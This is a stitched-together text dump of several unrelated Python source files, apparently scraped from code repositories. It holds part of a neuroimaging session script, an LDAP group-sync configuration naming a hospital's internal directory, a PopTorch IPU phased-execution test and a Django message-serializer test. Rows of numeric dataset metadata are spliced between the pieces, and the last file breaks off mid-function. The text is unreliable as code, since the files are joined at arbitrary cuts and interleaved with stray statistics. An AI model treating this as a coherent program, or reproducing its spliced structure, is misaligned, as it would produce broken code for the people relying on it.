'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session3, 'eye', 'IRF_sub-14_s3_r1_b1_2015-11-12_16-14-57.edf' ),
},
]
if s == 4:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 4,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session4, 'eye', 'IRF_sub-14_s4_r1_b1_2015-11-20_13-49-42.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-15':
# subject information
initials = 'sub-15'
firstName = 'sub-15'
standardFSID = 'sub-15_140316'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'measure_irf', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'measure_irf' + presentSubject.initials
if s == 1:
sessionDate = datetime.date(2015, 9, 26)
sj_session1 = 'sub-15_260915'
if s == 2:
sessionDate = datetime.date(2015, 10, 31)
sj_session2 = 'sub-15_311015'
if s == 3:
sessionDate = datetime.date(2015, 11, 07)
sj_session3 = 'sub-15_071115'
if s == 4:
sessionDate = datetime.date(2015, 11, 14)
sj_session4 = 'sub-15_141115'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
# No session 1
if s == 2:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 2,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session2, 'eye', 'IRF_sub-15_s2_r1_b1_2015-10-31_10-28-56.edf' ),
},
]
if s == 3:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 3,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session3, 'eye', 'IRF_sub-15_s3_r1_b1_2015-11-07_10-30-52.edf' ),
},
]
if s == 4:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 4,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session4, 'eye', 'IRF_sub-15_s4_r1_b1_2015-11-14_10-17-03.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
| 51.527828
| 242
| 0.425578
| 4,700
| 57,402
| 5.003404
| 0.06766
| 0.015054
| 0.037847
| 0.052985
| 0.815232
| 0.788187
| 0.775344
| 0.769689
| 0.7318
| 0.716618
| 0
| 0.083657
| 0.402756
| 57,402
| 1,113
| 243
| 51.574124
| 0.602281
| 0.055381
| 0
| 0.537014
| 0
| 0
| 0.161773
| 0.048172
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.015056
| null | null | 0.001255
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
38f46a32e32b616e475c46db3065b7db219b8328
| 4,454
|
py
|
Python
|
etc/sranacomln03.py
|
samuelpulfer/ldaptools
|
74df73365a83b3e520ed9f14c985a094b8f63261
|
[
"MIT"
] | 1
|
2015-11-30T18:41:33.000Z
|
2015-11-30T18:41:33.000Z
|
etc/sranacomln03.py
|
samuelpulfer/ldaptools
|
74df73365a83b3e520ed9f14c985a094b8f63261
|
[
"MIT"
] | null | null | null |
etc/sranacomln03.py
|
samuelpulfer/ldaptools
|
74df73365a83b3e520ed9f14c985a094b8f63261
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# log files
modification_logfile="var/modification.log"
userdn = "CN=Dir Sync,OU=Admin,OU=Users,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch"
userpw = None # stored in etc/`hostname`.pass
# Domain infos
baseDN = "dc=ms,dc=uhbs,dc=ch"
ldap_url = "ldap://ms.uhbs.ch:389"
# groups to sync
sync = [
# Ärzte
{
"from": "(&(cn=MQ_ANA_LA)(objectClass=group))",
"to": "CN=MQ_B_U_Anaesthesiologie-Aerzte-LA,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch",
"method": "sync", # sync|copy|delete
},
{
"from": "(&(cn=MQ_ANA_OA)(objectClass=group))",
"to": "CN=MQ_B_U_Anaesthesiologie-Aerzte-OA,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch",
"method": "sync", # sync|copy|delete
},
{
"from": "(&(cn=MQ_ANA_AA)(objectClass=group))",
"to": "CN=MQ_B_U_Anaesthesiologie-Aerzte-AA,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch",
"method": "sync", # sync|copy|delete
},
{
"from": "(&(cn=MQ_ANA_OIB_Aerzte)(objectClass=group))",
"to": "CN=MQ_B_U_Anaesthesiologie-Aerzte-OIB,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch",
"method": "sync", # sync|copy|delete
},
# Pflege
{
"from": "(&(cn=MQ_ANA_Pflege)(objectClass=group))",
"to": "CN=MQ_B_U_Anaesthesiologie-Pflege-ANA,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch",
"method": "sync", # sync|copy|delete
},
{
"from": "(&(cn=MQ_ANA_OIB_Pflege)(objectClass=group))",
"to": "CN=MQ_B_U_Anaesthesiologie-Pflege-OIB,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch",
"method": "sync", # sync|copy|delete
},
{
"from": "(&(cn=MQ_ANA_OPS)(objectClass=group))",
"to": "CN=MQ_B_U_Anaesthesiologie-Pflege-OPS,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch",
"method": "sync", # sync|copy|delete
},
# Admin
{
"from": "(&(cn=MQ_ANA_IT)(objectClass=group))",
"to": "CN=MQ_B_U_Anaesthesiologie-Admin-IT,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch",
"method": "sync", # sync|copy|delete
},
{
"from": "(&(cn=MQ_ANA_SEK)(objectClass=group))",
"to": "CN=MQ_B_U_Anaesthesiologie-Admin-Sek,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch",
"method": "sync", # sync|copy|delete
},
]
"""
{
"from": "CN=MQ_ANA_LA,OU=Exchange_Adressbuecher,OU=PITServer,DC=ms,DC=uhbs,DC=ch",
"to": "CN=MQ_B_U_Anaesthesiologie-Aerzte-LA,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch"
},
{
"from": "CN=MQ_ANA_OA,OU=Exchange_Adressbuecher,OU=PITServer,DC=ms,DC=uhbs,DC=ch",
"to": "CN=MQ_B_U_Anaesthesiologie-Aerzte-OA,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch"
},
{
"from": "CN=MQ_ANA_AA,OU=Exchange_Adressbuecher,OU=PITServer,DC=ms,DC=uhbs,DC=ch",
"to": "CN=MQ_B_U_Anaesthesiologie-Aerzte-AA,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch"
},
"""
# LOWERCASE a list of ad usernames to ignore in sync
sync_vd_ignore_user = ["keilc"]
# a list of groups to sync
sync_vd = [
{"filter": "(& (cn=MQ_ANA_AA) (objectClass=group) )", "to": "CN=MQ_B_M_Anaesthesiologie-VD-Aerzte-AA,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch"},
{"filter": "(& (cn=MQ_ANA_OA) (objectClass=group) )", "to": "CN=MQ_B_M_Anaesthesiologie-VD-Aerzte-OA,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch"},
{"filter": "(& (cn=MQ_ANA_LA) (objectClass=group) )", "to": "CN=MQ_B_M_Anaesthesiologie-VD-Aerzte-LA,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch"},
{"filter": "(& (cn=MQ_ANA_OIB_Aerzte) (objectClass=group) )", "to": "CN=MQ_B_M_Anaesthesiologie-VD-Aerzte-OIB,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch"},
{"filter": "(& (cn=MQ_ANA_OIB_Pflege) (objectClass=group) )", "to": "CN=MQ_B_M_Anaesthesiologie-VD-Pflege-OIB,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch"},
{"filter": "(& (cn=MQ_ANA_OPS) (objectClass=group) )", "to": "CN=MQ_B_M_Anaesthesiologie-VD-Pflege-OPS,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch"},
{"filter": "(& (cn=MQ_ANA_Pflege) (objectClass=group) )", "to": "CN=MQ_B_M_Anaesthesiologie-VD-Pflege-ANA,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch"},
{"filter": "(& (cn=MQ_ANA_IT) (objectClass=group) )", "to": "CN=MQ_B_M_Anaesthesiologie-VD-Admin-IT,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch"},
{"filter": "(& (cn=MQ_ANA_SEK) (objectClass=group) )", "to": "CN=MQ_B_M_Anaesthesiologie-VD-Admin-SEK,OU=Business,OU=Groups,OU=MQInf,OU=USB,DC=ms,DC=uhbs,DC=ch"},
]
| 42.419048
| 171
| 0.684104
| 779
| 4,454
| 3.759949
| 0.098845
| 0.057357
| 0.053261
| 0.088768
| 0.89621
| 0.892796
| 0.888016
| 0.888016
| 0.888016
| 0.8648
| 0
| 0.000981
| 0.084419
| 4,454
| 104
| 172
| 42.826923
| 0.717263
| 0.080377
| 0
| 0.140625
| 0
| 0.296875
| 0.80334
| 0.63173
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ac0a22794610844420e87546a7e6a1f701d475ad
| 17,667
|
py
|
Python
|
tests/phased_execution_test.py
|
NunoEdgarGFlowHub/poptorch
|
2e69b81c7c94b522d9f57cc53d31be562f5e3749
|
[
"MIT"
] | null | null | null |
tests/phased_execution_test.py
|
NunoEdgarGFlowHub/poptorch
|
2e69b81c7c94b522d9f57cc53d31be562f5e3749
|
[
"MIT"
] | null | null | null |
tests/phased_execution_test.py
|
NunoEdgarGFlowHub/poptorch
|
2e69b81c7c94b522d9f57cc53d31be562f5e3749
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2020 Graphcore Ltd. All rights reserved.
import torch
import torch.nn.functional as F
import poptorch
import helpers
# Model: 2x2 S1 ExecutionPhase, repeated N times:
# _____________________________________________________________________________
# phase 0: IPU 0 | IPU 2
# in0 ---- Slice/Slice -----------------------------.
# | | |
# w0 ----- MatMul | MatMul ----- w1
# | | |
# ReLU | ReLU
# | | |
# +------------------------.|.-----------+
#______________________________________X__(inter-phase cross-IPU copy)_________
# phase 1: IPU 1 /|\ IPU 3
# .-----------------------' | '----------.
# | | |
# w2 ----- MatMul | MatMul ----- w3
# | | |
# ReLU | ReLU
# | | |
# +------------------------.|.-----------+
# X (intra-phase cross-IPU copy)
# /|\
# .-----------------------' | '----------.
# | | |
# w4 ----- MatMul | MatMul ----- w5
# | | |
# ReLU | ReLU
# | | |
# +------------------------.|.-----------+
#______________________________________X_______________________________________
# phase 2: IPU 0 /|\ IPU 2
# ...... |
# ...... |
#______________________________________X__(inter-phase cross-IPU copy)_________
# phase N*2-1: IPU 1 /|\ IPU 3
# .-----------------------' | '----------.
# | | |
# w2 ----- MatMul | MatMul ----- w3
# | | |
# ReLU | ReLU
# | | |
# +------------------------.|.-----------+
# X (intra-phase cross-IPU copy)
# /|\
# .-----------------------' | '----------.
# | | |
# w4 ----- MatMul | MatMul ----- w5
# | | |
# ReLU | ReLU
# | | |
# +------------------------------------ Sum ----- L1Loss
#______________________________________|_______________________________________
class LogChecker(helpers.LogChecker):
def validate_2x2_parallel_phased_execution(self):
# pylint: disable=line-too-long
self.assert_contains("enablePipelining set to value 0")
self.assert_contains("executionPhaseSettings.stages set to value 2")
self.assert_contains("executionPhaseSettings.phases set to value 6")
self.assert_contains(
"location_activation set to value useOnChipStorage(False)")
self.assert_contains(
"location_weight set to value useOnChipStorage(False)")
self.assert_contains(
"location_optimizer set to value useOnChipStorage(False)")
self.assert_contains(
"location_accumulator set to value useOnChipStorage(False)")
self.assert_contains(
"Slice:0 [float32(10, 1), mode(Phased), ipu(0), phase(0)]")
self.assert_contains(
"Slice:0/1 [float32(10, 1), mode(Phased), ipu(0), phase(0)]")
self.assert_contains(
"MatMul:0 [float32(10, 1), mode(Phased), ipu(0), phase(0)]")
self.assert_contains(
"Relu:0 [float32(10, 1), mode(Phased), ipu(0), phase(0)]")
self.assert_contains(
"MatMul:0/1 [float32(10, 1), mode(Phased), ipu(2), phase(0)]")
self.assert_contains(
"Relu:0/1 [float32(10, 1), mode(Phased), ipu(2), phase(0)]")
self.assert_contains(
"MatMul:0/2 [float32(10, 1), mode(Phased), ipu(1), phase(1)]")
self.assert_contains(
"Relu:0/2 [float32(10, 1), mode(Phased), ipu(1), phase(1)]")
self.assert_contains(
"MatMul:0/3 [float32(10, 1), mode(Phased), ipu(3), phase(1)]")
self.assert_contains(
"Relu:0/3 [float32(10, 1), mode(Phased), ipu(3), phase(1)]")
self.assert_contains(
"MatMul:0/4 [float32(10, 1), mode(Phased), ipu(1), phase(1)]")
self.assert_contains(
"Relu:0/4 [float32(10, 1), mode(Phased), ipu(1), phase(1)]")
self.assert_contains(
"MatMul:0/5 [float32(10, 1), mode(Phased), ipu(3), phase(1)]")
self.assert_contains(
"Relu:0/5 [float32(10, 1), mode(Phased), ipu(3), phase(1)]")
self.assert_contains(
"MatMul:0/6 [float32(10, 1), mode(Phased), ipu(0), phase(2)]")
self.assert_contains(
"Relu:0/6 [float32(10, 1), mode(Phased), ipu(0), phase(2)]")
self.assert_contains(
"MatMul:0/7 [float32(10, 1), mode(Phased), ipu(2), phase(2)]")
self.assert_contains(
"Relu:0/7 [float32(10, 1), mode(Phased), ipu(2), phase(2)]")
self.assert_contains(
"MatMul:0/8 [float32(10, 1), mode(Phased), ipu(1), phase(3)]")
self.assert_contains(
"Relu:0/8 [float32(10, 1), mode(Phased), ipu(1), phase(3)]")
self.assert_contains(
"MatMul:0/9 [float32(10, 1), mode(Phased), ipu(3), phase(3)]")
self.assert_contains(
"Relu:0/9 [float32(10, 1), mode(Phased), ipu(3), phase(3)]")
self.assert_contains(
"MatMul:0/10 [float32(10, 1), mode(Phased), ipu(1), phase(3)]")
self.assert_contains(
"Relu:0/10 [float32(10, 1), mode(Phased), ipu(1), phase(3)]")
self.assert_contains(
"MatMul:0/11 [float32(10, 1), mode(Phased), ipu(3), phase(3)]")
self.assert_contains(
"Relu:0/11 [float32(10, 1), mode(Phased), ipu(3), phase(3)]")
self.assert_contains(
"MatMul:0/12 [float32(10, 1), mode(Phased), ipu(0), phase(4)]")
self.assert_contains(
"Relu:0/12 [float32(10, 1), mode(Phased), ipu(0), phase(4)]")
self.assert_contains(
"MatMul:0/13 [float32(10, 1), mode(Phased), ipu(2), phase(4)]")
self.assert_contains(
"Relu:0/13 [float32(10, 1), mode(Phased), ipu(2), phase(4)]")
self.assert_contains(
"MatMul:0/14 [float32(10, 1), mode(Phased), ipu(1), phase(5)]")
self.assert_contains(
"Relu:0/14 [float32(10, 1), mode(Phased), ipu(1), phase(5)]")
self.assert_contains(
"MatMul:0/15 [float32(10, 1), mode(Phased), ipu(3), phase(5)]")
self.assert_contains(
"Relu:0/15 [float32(10, 1), mode(Phased), ipu(3), phase(5)]")
self.assert_contains(
"MatMul:0/16 [float32(10, 1), mode(Phased), ipu(1), phase(5)]")
self.assert_contains(
"Relu:0/16 [float32(10, 1), mode(Phased), ipu(1), phase(5)]")
self.assert_contains(
"MatMul:0/17 [float32(10, 1), mode(Phased), ipu(3), phase(5)]")
self.assert_contains(
"Relu:0/17 [float32(10, 1), mode(Phased), ipu(3), phase(5)]")
self.assert_contains(
"Add:0 [float32(10, 1), mode(Phased), ipu(3), phase(5)]")
self.assert_contains(
"Sub:0 [float32(10, 1), mode(Phased), ipu(3), phase(5)]")
self.assert_contains(
"L1:0 [float32(shape inference failed), mode(Phased), ipu(3), phase(5)]"
)
self.assert_contains(
"IdentityLoss:0 [float32(shape inference failed), mode(Phased), ipu(3), phase(5)]"
)
# pylint: enable=line-too-long
def validate_2x2_parallel_phased_execution_small(self):
# pylint: disable=line-too-long
self.assert_contains("enablePipelining set to value 0")
self.assert_contains("executionPhaseSettings.stages set to value 2")
self.assert_contains("executionPhaseSettings.phases set to value 2")
self.assert_contains(
"location_activation set to value useOnChipStorage(False)")
self.assert_contains(
"location_weight set to value useOnChipStorage(False)")
self.assert_contains(
"location_optimizer set to value useOnChipStorage(False)")
self.assert_contains(
"location_accumulator set to value useOnChipStorage(False)")
self.assert_contains(
"Slice:0 [float32(10, 1), mode(Phased), ipu(0), phase(0)]")
self.assert_contains(
"Slice:0/1 [float32(10, 1), mode(Phased), ipu(0), phase(0)]")
self.assert_contains(
"MatMul:0 [float32(10, 1), mode(Phased), ipu(0), phase(0)]")
self.assert_contains(
"Relu:0 [float32(10, 1), mode(Phased), ipu(0), phase(0)]")
self.assert_contains(
"MatMul:0/1 [float32(10, 1), mode(Phased), ipu(2), phase(0)]")
self.assert_contains(
"Relu:0/1 [float32(10, 1), mode(Phased), ipu(2), phase(0)]")
self.assert_contains(
"MatMul:0/2 [float32(10, 1), mode(Phased), ipu(1), phase(1)]")
self.assert_contains(
"Relu:0/2 [float32(10, 1), mode(Phased), ipu(1), phase(1)]")
self.assert_contains(
"MatMul:0/3 [float32(10, 1), mode(Phased), ipu(3), phase(1)]")
self.assert_contains(
"Relu:0/3 [float32(10, 1), mode(Phased), ipu(3), phase(1)]")
self.assert_contains(
"MatMul:0/4 [float32(10, 1), mode(Phased), ipu(1), phase(1)]")
self.assert_contains(
"Relu:0/4 [float32(10, 1), mode(Phased), ipu(1), phase(1)]")
self.assert_contains(
"MatMul:0/5 [float32(10, 1), mode(Phased), ipu(3), phase(1)]")
self.assert_contains(
"Relu:0/5 [float32(10, 1), mode(Phased), ipu(3), phase(1)]")
self.assert_contains(
"Add:0 [float32(10, 1), mode(Phased), ipu(3), phase(1)]")
self.assert_contains(
"Sub:0 [float32(10, 1), mode(Phased), ipu(3), phase(1)]")
self.assert_contains(
"L1:0 [float32(shape inference failed), mode(Phased), ipu(3), phase(1)]"
)
self.assert_contains(
"IdentityLoss:0 [float32(shape inference failed), mode(Phased), ipu(3), phase(1)]"
)
# pylint: enable=line-too-long
def test_2x2_parallel_phased_execution_inline(capfd):
poptorch.setLogLevel(1) # Force debug logging
N = 3
size = 10
class Model(torch.nn.Module):
def __init__(self):
super().__init__()
self.weights = []
for n in range(N * 6):
weight = torch.nn.Parameter(torch.rand(size, size),
requires_grad=True)
self.register_parameter(f"w{n}", weight)
self.weights.append(weight)
def forward(self, in0, target=None):
phase = 0
with poptorch.Block("0", ipu_id=0):
ins = torch.split(in0, size)
weight = iter(self.weights)
for n in range(N * 3):
out = []
for ipu in range(2):
x = ins[ipu]
# Alternate between 0-2 and 1-3
ipu = (phase % 2) + ipu * 2
with poptorch.Block(f"{phase}", ipu_id=ipu):
x = torch.matmul(next(weight), x)
out.append(F.relu(x))
ins = out[1], out[0]
# We want 2 matmuls in the same phase
if n % 3 != 1:
phase += 1
with poptorch.Block(f"{N*2-1}", ipu_id=3):
res = ins[0] + ins[1]
if target is None:
return res
return res, torch.nn.L1Loss(reduction="mean")(res, target)
input = torch.rand(size * 2, 1)
target = torch.rand(size, 1)
model = Model()
opts = poptorch.Options()
phases = []
phases = [f"{n}" for n in range(2 * N)]
opts.setExecutionStrategy(poptorch.ParallelPhasedExecution(*phases))
poptorch_model = poptorch.trainingModel(model, opts)
poptorch_model.compile(input, target)
testlog = LogChecker(capfd)
testlog.validate_2x2_parallel_phased_execution()
def test_2x2_parallel_phased_execution_opts(capfd):
poptorch.setLogLevel(1) # Force debug logging
N = 3
size = 10
class Model(torch.nn.Module):
def __init__(self):
super().__init__()
self.weights = []
for n in range(N * 6):
weight = torch.nn.Parameter(torch.rand(size, size),
requires_grad=True)
self.register_parameter(f"w{n}", weight)
self.weights.append(weight)
def forward(self, in0, target=None):
phase = 0
weight = iter(self.weights)
with poptorch.Block("phase0_ipu0"):
ins = torch.split(in0, size)
for n in range(N * 3):
out = []
for ipu in range(2):
x = ins[ipu]
with poptorch.Block(f"phase{phase}_ipu{ipu}"):
x = torch.matmul(next(weight), x)
out.append(F.relu(x))
ins = out[1], out[0]
# We want 2 matmuls in the same phase
if n % 3 != 1:
phase += 1
with poptorch.Block(f"phase{N*2-1}_ipu1"):
res = ins[0] + ins[1]
if target is None:
return res
return res, torch.nn.L1Loss(reduction="mean")(res, target)
input = torch.rand(size * 2, 1)
target = torch.rand(size, 1)
model = Model()
opts = poptorch.Options()
phases = []
# Alternate between 0-2 and 1-3
for n in range(N):
phases.append([
poptorch.Stage(f"phase{2*n}_ipu0").ipu(0),
poptorch.Stage(f"phase{2*n}_ipu1").ipu(2)
])
phases.append([
poptorch.Stage(f"phase{2*n+1}_ipu0").ipu(1),
poptorch.Stage(f"phase{2*n+1}_ipu1").ipu(3)
])
opts.setExecutionStrategy(poptorch.ParallelPhasedExecution(*phases))
poptorch_model = poptorch.trainingModel(model, opts)
poptorch_model.compile(input, target)
testlog = LogChecker(capfd)
testlog.validate_2x2_parallel_phased_execution()
def test_2x2_parallel_phased_execution_small_opts(capfd):
poptorch.setLogLevel(1) # Force debug logging
size = 10
class Model(torch.nn.Module):
def __init__(self):
super().__init__()
self.weights = []
for n in range(6):
weight = torch.nn.Parameter(torch.rand(size, size),
requires_grad=True)
self.register_parameter(f"w{n}", weight)
self.weights.append(weight)
def forward(self, in0, target=None):
poptorch.Block.useAutoId()
weight = iter(self.weights)
# Phase 0 / ipu 0
with poptorch.Block():
in0, in1 = torch.split(in0, size)
x = torch.matmul(next(weight), in0)
out0 = F.relu(x)
# Phase 0 / ipu 2
with poptorch.Block():
x = torch.matmul(next(weight), in1)
out1 = F.relu(x)
in0, in1 = out1, out0
# Phase 1 / ipu 1
with poptorch.Block():
x = torch.matmul(next(weight), in0)
out0 = F.relu(x)
# Phase 1 / ipu 3
with poptorch.Block():
x = torch.matmul(next(weight), in1)
out1 = F.relu(x)
in0, in1 = out1, out0
# Phase 1 / ipu 1 - part 2
with poptorch.Block():
x = torch.matmul(next(weight), in0)
out0 = F.relu(x)
# Phase 1 / ipu 3 - part 2
with poptorch.Block():
x = torch.matmul(next(weight), in1)
out1 = F.relu(x)
res = out0 + out1
if target is None:
return res
return res, torch.nn.L1Loss(reduction="mean")(res, target)
input = torch.rand(size * 2, 1)
target = torch.rand(size, 1)
model = Model()
opts = poptorch.Options()
strategy = poptorch.ParallelPhasedExecution(
[poptorch.Stage("0"), poptorch.Stage("1")],
[poptorch.Stage("2", "4"),
poptorch.Stage("3", "5")])
# Alternate between 0-2 and 1-3
strategy.phase(0).ipus(0, 2)
strategy.phase(1).ipus(1, 3)
opts.setExecutionStrategy(strategy)
poptorch_model = poptorch.trainingModel(model, opts)
poptorch_model.compile(input, target)
testlog = LogChecker(capfd)
testlog.validate_2x2_parallel_phased_execution_small()
| 40.895833
| 94
| 0.490123
| 1,947
| 17,667
| 4.193118
| 0.087827
| 0.090642
| 0.163155
| 0.096031
| 0.911318
| 0.897232
| 0.874694
| 0.849461
| 0.835252
| 0.835252
| 0
| 0.064058
| 0.354956
| 17,667
| 431
| 95
| 40.990719
| 0.652334
| 0.194487
| 0
| 0.760656
| 0
| 0.196721
| 0.308969
| 0.022669
| 0
| 0
| 0
| 0
| 0.242623
| 1
| 0.036066
| false
| 0
| 0.013115
| 0
| 0.081967
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ac4164d0f9356a9a1322fd64fb5ad1265aa1d4f0
| 77,260
|
py
|
Python
|
services/apis/django-api/source/api/ems_utils/tests/test_message_format_serializers.py
|
fzi-forschungszentrum-informatik/BEMCom
|
0a0c359d889c6d5975e4d4d3b17c24adb5bf883b
|
[
"MIT"
] | 4
|
2021-09-10T09:46:18.000Z
|
2021-12-05T17:55:14.000Z
|
services/apis/django-api/source/api/ems_utils/tests/test_message_format_serializers.py
|
fzi-forschungszentrum-informatik/BEMCom
|
0a0c359d889c6d5975e4d4d3b17c24adb5bf883b
|
[
"MIT"
] | null | null | null |
services/apis/django-api/source/api/ems_utils/tests/test_message_format_serializers.py
|
fzi-forschungszentrum-informatik/BEMCom
|
0a0c359d889c6d5975e4d4d3b17c24adb5bf883b
|
[
"MIT"
] | null | null | null |
import json
import logging
from django.db import connection, models
from django.test import TransactionTestCase
from ems_utils.message_format.models import DatapointTemplate
from ems_utils.message_format.models import DatapointValueTemplate
from ems_utils.message_format.models import DatapointScheduleTemplate
from ems_utils.message_format.models import DatapointSetpointTemplate
from ems_utils.message_format.serializers import DatapointValueSerializer
from ems_utils.message_format.serializers import DatapointScheduleSerializer
from ems_utils.message_format.serializers import DatapointSetpointSerializer
from ems_utils.timestamp import datetime_from_timestamp, timestamp_utc_now
logger = logging.getLogger(__name__)
class TestDatapointValueSerializer(TransactionTestCase):
@classmethod
def setUpClass(cls):
# Datapoint model is abstract, hence no table exists. Here we
# create a concrete model as child of datapoint and create a table
# on the fly for testing.
class Datapoint(DatapointTemplate):
class Meta:
app_label="test_message_format_models_5"
class DatapointValue(DatapointValueTemplate):
class Meta:
app_label="test_message_format_models_5"
# The datapoint foreign key must be overwritten as it points
# to the abstract datapoint model by default.
datapoint = models.ForeignKey(
Datapoint,
on_delete=models.CASCADE,
)
cls.Datapoint = Datapoint
cls.DatapointValue = DatapointValue
with connection.schema_editor() as schema_editor:
schema_editor.create_model(cls.Datapoint)
schema_editor.create_model(cls.DatapointValue)
# Create a dummy datapoint to be used as foreign key for the msgs.
cls.datapoint = cls.Datapoint(type="sensor")
cls.datapoint.save()
# Here are the default field values:
cls.default_field_values = {
"datapoint": cls.datapoint,
"time": datetime_from_timestamp(1612860152000),
}
@classmethod
def tearDownClass(cls) -> None:
# Finally, erase the table of the temporary model.
with connection.schema_editor() as schema_editor:
schema_editor.delete_model(cls.Datapoint)
schema_editor.delete_model(cls.DatapointValue)
def tearDown(self):
"""
Remove the dummy datapoint, so next test starts with empty tables.
"""
self.DatapointValue.objects.all().delete()
def test_to_representation(self):
"""
Check that a value message is serialzed as expected.
"""
for test_value in [1, 2.2, "not a number", None, True, False]:
expected_data = {
"value": json.dumps(test_value),
"timestamp": timestamp_utc_now(),
}
field_values = self.default_field_values.copy()
field_values.update({
"value": test_value,
"time": datetime_from_timestamp(expected_data["timestamp"])
})
dp_value = self.DatapointValue.objects.create(**field_values)
serializer = DatapointValueSerializer(dp_value)
assert serializer.data == expected_data
def test_required_fields(self):
"""
Check that timestamp and value fields must be provided.
"""
field_values = self.default_field_values.copy()
dp_value = self.DatapointValue.objects.create(**field_values)
test_data = json.loads('{}')
serializer = DatapointValueSerializer(dp_value, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
assert caught_execption.status_code == 400
assert "value" in caught_execption.detail
assert "timestamp" in caught_execption.detail
def test_numeric_values_validated(self):
"""
Check that for numeric data_format values, only numeric values are
accepted.
"""
dp = self.datapoint
numeric_data_formats = [
"generic_numeric",
"continuous_numeric",
"discrete_numeric",
]
for data_format in numeric_data_formats:
# Verify that Non numeric types will raise.
for test_data_value in ["not a number", True, False]:
dp.data_format = data_format
dp.allowed_values = [test_data_value]
dp.save()
test_data = {
"value": json.dumps(test_data_value),
"timestamp": timestamp_utc_now(),
}
serializer = DatapointValueSerializer(dp, data=test_data)
caught_execption = None
try:
serializer.is_valid(raise_exception=True)
except Exception as e:
caught_execption = e
assert caught_execption is not None
assert caught_execption.status_code == 400
assert "value" in caught_execption.detail
# Check that JSON encoded floats and ints are encoded during
# validation.
for test_data_value in [1, 2.2, None]:
dp.data_format = data_format
dp.allowed_values = [test_data_value]
dp.save()
test_data = {
"value": json.dumps(test_data_value),
"timestamp": timestamp_utc_now(),
}
serializer = DatapointValueSerializer(dp, data=test_data)
assert serializer.is_valid(raise_exception=True)
assert serializer.validated_data["value"] == test_data_value
def test_text_values_validated(self):
"""
Verify that text datapoints don't accept numeric values or bools.
"""
dp = self.datapoint
text_data_formats = [
"generic_text",
"discrete_text",
]
for data_format in text_data_formats:
